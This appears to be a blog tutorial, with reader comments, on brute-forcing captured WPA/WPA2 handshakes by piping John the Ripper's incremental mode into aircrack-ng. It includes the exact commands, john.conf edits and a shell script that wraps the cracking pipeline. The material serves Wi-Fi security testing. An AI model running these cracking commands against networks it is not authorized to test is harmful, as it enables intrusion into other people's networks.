
Brute forcing WPA/WPA2 handshakes with John the Ripper

Please refer to this article for a tutorial on how to obtain a handshake.

How to crack WPA/WPA 2 with aircrack-ng (Backtrack 5) 

The limitation of a dictionary attack is that unless the passphrase is in your wordlist, the attack fails. The other way to obtain the passphrase is to brute force it: let John the Ripper generate candidates in incremental mode and pipe them into aircrack-ng. In theory this finds ANY passphrase, but in practice the keyspace is the problem. A WPA passphrase is 8 to 63 printable ASCII characters, and because every candidate costs a PBKDF2 derivation (4096 HMAC-SHA1 iterations), aircrack-ng only tests roughly a few thousand candidates per second per CPU core. Even the shortest legal length, 8 characters drawn from the 95 printable ASCII characters, is 95^8, about 6.6 x 10^15 candidates, which at that rate is on the order of a hundred thousand years on one machine; anything longer is out of reach.

Ok, the command. Note the "-w -": it tells aircrack-ng to read the wordlist from standard input, which is where john's --stdout writes. Without it aircrack-ng would treat the capture file as the wordlist and never see the handshake.

This was on Backtrack
/pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b <bssid> -w - file.cap

Debian
sudo apt-get install john
/usr/sbin/john --stdout --incremental:all | aircrack-ng -b <bssid> -w - file.cap

<bssid> is the MAC address of the access point and file.cap is the capture that contains the four-way handshake.


By default john's incremental mode tries passwords of 0 to 8 characters (MinLen = 0, MaxLen = 8 in the [Incremental:...] section of john.conf). The minimum WPA passphrase length is 8, so the default range spends almost all of its time on candidates that aircrack-ng rejects out of hand, and it never goes beyond 8. Edit the relevant section of john.conf and set MinLen = 8 and MaxLen to the longest length you are willing to search. Be aware that john 1.7.x has a compile-time limit of 8 for incremental mode (CHARSET_LENGTH in src/params.h) and refuses a larger MaxLen unless you raise that constant and rebuild; john 1.8.0 and later raised the limit to 24 and ship .chr files trained for longer lengths. The jumbo builds additionally accept --min-length and --max-length on the command line, which avoids editing the config at all.
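A john.conf fragment showing the change, added here as an illustration rather than copied from the post. The "before" section is what john 1.7.x ships as [Incremental:All]; john 1.8.0 and later name the same 95-character mode [Incremental:ASCII] and default MaxLen to 13. MaxLen = 10 is an assumed value, picked to keep the search bounded:

```ini
# Before: as shipped in john 1.7.x. Lengths 0-7 are useless for WPA,
# and the search stops at 8.
[Incremental:All]
File = $JOHN/all.chr
MinLen = 0
MaxLen = 8
CharCount = 95

# After: edited for WPA. Start at the minimum legal passphrase length
# and search up to 10 (assumed value; 95^10 is far beyond a single machine).
[Incremental:All]
File = $JOHN/all.chr
MinLen = 8
MaxLen = 10
CharCount = 95
```

Only one copy of the section belongs in the real file; the two are shown side by side for comparison. On john 1.7.x the edited MaxLen produces exactly the "exceeds the compile-time limit of 8" error quoted in the comments below; either raise CHARSET_LENGTH in src/params.h and rebuild, or use john 1.8.0 or later.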

"--incremental:all" (current versions document the form --incremental=All; the mode name is matched case-insensitively against the [Incremental:NAME] sections of your john.conf, and in john 1.8.0 and later the equivalent 95-character section is called ASCII) means that john will build candidates from all 95 printable ASCII characters, which will take thousands of years to complete if the passphrase has a proper length. You can also try -i:digits for digits only (10^8 = 100 million candidates at length 8, which is feasible in about a day at a few thousand per second) or -i:alpha for lowercase a to z only (26^8, about 2.1 x 10^11, a few years at that rate). Whatever mode you pick, the available names are the [Incremental:...] sections present in your own john.conf.
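The pipeline above with the two practical additions a tester wants: a length filter so that only candidates aircrack-ng can actually use reach it, and a keyspace estimate for the mode chosen. This is an added example, not code from the original post; the BSSID, capture file name and the 1000 candidates/second figure in the usage line are assumed placeholders.

```sh
#!/bin/sh
# Added example: helpers around the "john --stdout | aircrack-ng" pipeline.
# Assumed values: the BSSID, capture file and rate in the usage comment below.

# wpa_filter: pass through only candidates aircrack-ng can use. WPA-PSK
# passphrases are 8 to 63 printable ASCII characters; aircrack-ng rejects
# anything else anyway, so dropping it here keeps dead candidates out of the pipe.
wpa_filter() {
    awk 'length($0) >= 8 && length($0) <= 63'
}

# keyspace CHARS LEN: number of candidates of exactly LEN characters drawn from
# an alphabet of CHARS symbols (95 = printable ASCII, 26 = a-z, 10 = digits).
# Printed as an integer; values up to 2^53 are exact in awk's doubles.
keyspace() {
    awk -v c="$1" -v l="$2" 'BEGIN { printf "%.0f\n", c ^ l }'
}

# eta_days CHARS LEN RATE: days needed to exhaust that keyspace at RATE
# candidates per second, one decimal place.
eta_days() {
    awk -v c="$1" -v l="$2" -v r="$3" 'BEGIN { printf "%.1f\n", c ^ l / r / 86400 }'
}

# crack_wpa BSSID CAPFILE MODE: the pipeline from the post, with "-w -" so that
# aircrack-ng reads candidates from standard input, and the length filter in
# between. MODE is an [Incremental:MODE] section name from john.conf
# (Digits, Alpha, All on 1.7.x, ASCII on 1.8.0+). Defined but not run here.
crack_wpa() {
    john --stdout --incremental="$3" | wpa_filter | aircrack-ng -b "$1" -w - "$2"
}

# Usage (assumed values):
#   eta_days 10 8 1000       # all 8-digit passphrases at 1000 c/s: about 1.2 days
#   eta_days 95 8 1000       # 8 printable ASCII chars at 1000 c/s: ~77 million days
#   crack_wpa 00:11:22:33:44:55 handshake.cap Digits
```

Run the eta_days estimate before committing a machine to a mode: the digits-only search is a realistic overnight job, while the full printable-ASCII search at the minimum length already works out to well over a hundred thousand years at that rate.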

Good luck.

P.S.: You might be interested in this simple Linux dictionary password cracker written in python:  Article

Comments

  1. I edited the john.conf file to brute force 8 characters and more, but when executing the command it returns with an error:

    "MaxLen = 10 exceeds the compile-time limit of 8

    There are several good reasons why you probably don't need to raise it:
    - many hash types don't support passwords (or password halves) longer than
    7 or 8 characters;
    - you probably don't have sufficient statistical information to generate a
    charset file for lengths beyond 8;
    - the limitation applies to incremental mode only."

  2. Can this be done with THC Hydra? (It's imho much better.)

  3. It works for me, but this command isn't working:
    "--incremental:all". You either type "incremental=" and leave it blank, or use one of the incremental types you find in /etc/john/john.conf.
    The question is: if I leave it blank, or if I use "ASCII",
    will this include uppercase and special characters?


